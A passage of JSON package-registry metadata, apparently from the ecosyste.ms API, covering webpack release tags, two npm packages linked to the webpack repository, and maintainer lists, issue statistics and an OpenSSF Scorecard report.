repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T13:45:50.716Z","dependent_packages_count":1,"downloads":20,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":32.37087298809202,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.08412454391301193,"forks_count":0.5276340879249939,"average":14.906911632847315},"purl":"pkg:npm/dva_folder_create","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/dva_folder_create","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/dva_folder_create","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/dva_folder_create/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/dva_folder_create/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/dva_folder_create/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/dva_folder_create/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/dva_folder_create/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/dva_folder_create/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/dva_folder_create/codemeta","maintainers":[{"uuid":"kuke","login":"kuke","name":null,"email":"821826173@qq.com","url":null,"packages_count":3,"html_url":"https://www.npmjs.com/~kuke","role":null,"created_at":"2022-11-12T03:20:12.521Z","updated_at":"2022-11-12T03:20:12.521Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/kuke/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":4603707,"name":"webpack-4-modern-acorn","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2022-07-20T11:29:25.509Z","latest_release_published_at":"2022-07-20T11:29:25.509Z","latest_release_number":"4.45.1-modern-acorn-0","last_synced_at":"2026-09-03T00:23:26.169Z","created_at":"2022-07-20T11:30:45.812Z","updated_at":"2026-09-03T00:23:26.169Z","registry_url":"https://www.npmjs.com/package/webpack-4-modern-acorn","install_command":"npm install webpack-4-modern-acorn","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"next":"4.45.1-modern-acorn-0","latest":"4.45.1-modern-acorn-0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using 